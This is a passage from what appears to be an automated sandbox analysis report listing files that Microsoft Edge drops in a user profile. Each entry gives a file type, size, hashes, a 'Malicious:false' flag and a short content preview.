                                                                                                                                                                                                                                                                                                                                    SSDEEP:6:56f90TlL+q2P923oH+TcwtfrzAdIFUt8M6f90uj1Zmw+M6f90u1LVkwO923oH+TC:of68v4Yeb9FUt8xf6+1/+xf6w5LYeb2J
                                                                                                                                                                                                                                                                                                                                    MD5:5616484730608609232AFF57DD4233EA
                                                                                                                                                                                                                                                                                                                                    SHA1:FBD88FE9FE3431C106171233B1B6F96CBA7D7522
                                                                                                                                                                                                                                                                                                                                    SHA-256:14798BEAB1C04C28DDF054C3890522CBCC8B14009FAEFEEFAADF47FD59EC8CC1
                                                                                                                                                                                                                                                                                                                                    SHA-512:EEF2CD2798B870A2539CEA9F6144018AAFC2E7A170CF79DF3FF08C87D338232414492FD8AAA8D16D95764012CB9FAD5F52D2846A70D46483A365C071EDD5A2AC
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:2024/12/31-03:46:26.362 9a8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/31-03:46:26.363 9a8 Recovering log #3.2024/12/31-03:46:26.363 9a8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):120
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.32524464792714
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                                                                                                                                    MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                                                                                                                                    SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                                                                                                                                    SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                                                                                                                                                    SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):13
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):2.7192945256669794
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                                                                                                                                                                                    MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                                                                                                                                                                                    SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                                                                                                                                                                                    SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                                                                                                                                                                                    SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:117.0.2045.47
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):44137
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.090726234171398
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMmwuF9hDO6vP6O+ttbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEA6Utbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                                                    MD5:B368358F6E963E0B802A103CB02EA4B6
                                                                                                                                                                                                                                                                                                                                    SHA1:E892EF2580C9227766A87B9A9AE002B8D13C742D
                                                                                                                                                                                                                                                                                                                                    SHA-256:DEB635F97706C2317D11561162008D9C4D2E4F11F7494A6BF635502069D32F17
                                                                                                                                                                                                                                                                                                                                    SHA-512:1B668CB997ED518FA6E6E6C1A744F5F25BCCDEEEECD09FEC4FAC719D4BE6483F0CA3472376F79F48AD9BD3699FCC6BDB6ABE7412F35C6D0E66FC393C231B2729
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):44137
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.090726234171398
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMmwuF9hDO6vP6O+ttbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEA6Utbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                                                    MD5:B368358F6E963E0B802A103CB02EA4B6
                                                                                                                                                                                                                                                                                                                                    SHA1:E892EF2580C9227766A87B9A9AE002B8D13C742D
                                                                                                                                                                                                                                                                                                                                    SHA-256:DEB635F97706C2317D11561162008D9C4D2E4F11F7494A6BF635502069D32F17
                                                                                                                                                                                                                                                                                                                                    SHA-512:1B668CB997ED518FA6E6E6C1A744F5F25BCCDEEEECD09FEC4FAC719D4BE6483F0CA3472376F79F48AD9BD3699FCC6BDB6ABE7412F35C6D0E66FC393C231B2729
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):44137
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.090726234171398
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMmwuF9hDO6vP6O+ttbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEA6Utbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                                                    MD5:B368358F6E963E0B802A103CB02EA4B6
                                                                                                                                                                                                                                                                                                                                    SHA1:E892EF2580C9227766A87B9A9AE002B8D13C742D
                                                                                                                                                                                                                                                                                                                                    SHA-256:DEB635F97706C2317D11561162008D9C4D2E4F11F7494A6BF635502069D32F17
                                                                                                                                                                                                                                                                                                                                    SHA-512:1B668CB997ED518FA6E6E6C1A744F5F25BCCDEEEECD09FEC4FAC719D4BE6483F0CA3472376F79F48AD9BD3699FCC6BDB6ABE7412F35C6D0E66FC393C231B2729
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):44137
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.090726234171398
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMmwuF9hDO6vP6O+ttbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEA6Utbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                                                    MD5:B368358F6E963E0B802A103CB02EA4B6
                                                                                                                                                                                                                                                                                                                                    SHA1:E892EF2580C9227766A87B9A9AE002B8D13C742D
                                                                                                                                                                                                                                                                                                                                    SHA-256:DEB635F97706C2317D11561162008D9C4D2E4F11F7494A6BF635502069D32F17
                                                                                                                                                                                                                                                                                                                                    SHA-512:1B668CB997ED518FA6E6E6C1A744F5F25BCCDEEEECD09FEC4FAC719D4BE6483F0CA3472376F79F48AD9BD3699FCC6BDB6ABE7412F35C6D0E66FC393C231B2729
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):44137
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.090726234171398
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMmwuF9hDO6vP6O+ttbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEA6Utbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                                                    MD5:B368358F6E963E0B802A103CB02EA4B6
                                                                                                                                                                                                                                                                                                                                    SHA1:E892EF2580C9227766A87B9A9AE002B8D13C742D
                                                                                                                                                                                                                                                                                                                                    SHA-256:DEB635F97706C2317D11561162008D9C4D2E4F11F7494A6BF635502069D32F17
                                                                                                                                                                                                                                                                                                                                    SHA-512:1B668CB997ED518FA6E6E6C1A744F5F25BCCDEEEECD09FEC4FAC719D4BE6483F0CA3472376F79F48AD9BD3699FCC6BDB6ABE7412F35C6D0E66FC393C231B2729
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):20480
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.6773696719930975
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:TLpUAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3islRud6zcQAJmdngzQdoO:TLiOUOq0afDdWec9sJhOs3fsuZ7J5fc
                                                                                                                                                                                                                                                                                                                                    MD5:6FFCCB198DC6B17E165460E6E246B03C
                                                                                                                                                                                                                                                                                                                                    SHA1:014A46B0E6E84089E1C20FA232F54CA737D5F023
                                                                                                                                                                                                                                                                                                                                    SHA-256:D1B2EC8C9906C3418837FFB8E116AA59C026DE2D67B2AFDA956F14D0DC3851AF
                                                                                                                                                                                                                                                                                                                                    SHA-512:846AE3D0A49A14BF82203A0FEDAD6E794F7E68C22A40EE0E014FEA99DFC676FAE4AFEB2C56F324E4361E83A35458C63E2ABAA7B28B6D23B20FA29EF47CBE87B3
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):47
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.3818353308528755
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                                                                                                                                                                    MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                                                                                                                                                                    SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                                                                                                                                                                                    SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                                                                                                                                                                                    SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):35
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.014438730983427
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                                                                                                                                                                                    MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                                                                                                                                                                                    SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                                                                                                                                                                                    SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                                                                                                                                                                                    SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{"forceServiceDetermination":false}
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):81
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.3439888556902035
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
                                                                                                                                                                                                                                                                                                                                    MD5:177F4D75F4FEE84EF08C507C3476C0D2
                                                                                                                                                                                                                                                                                                                                    SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
                                                                                                                                                                                                                                                                                                                                    SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
                                                                                                                                                                                                                                                                                                                                    SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):130439
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.80180718117079
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
                                                                                                                                                                                                                                                                                                                                    MD5:EB75CEFFE37E6DF9C171EE8380439EDA
                                                                                                                                                                                                                                                                                                                                    SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
                                                                                                                                                                                                                                                                                                                                    SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
                                                                                                                                                                                                                                                                                                                                    SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):40
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.346439344671015
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                                                                                                                                                                                                                    MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                                                                                                                                                                                                                    SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                                                                                                                                                                                                                    SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                                                                                                                                                                                                                    SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:synchronousLookupUris_638343870221005468
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):57
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.556488479039065
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                                                                                                                                                                                                                    MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                                                                                                                                                                                                                    SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                                                                                                                                                                                                                    SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                                                                                                                                                                                                                    SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):50
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.9904355005135823
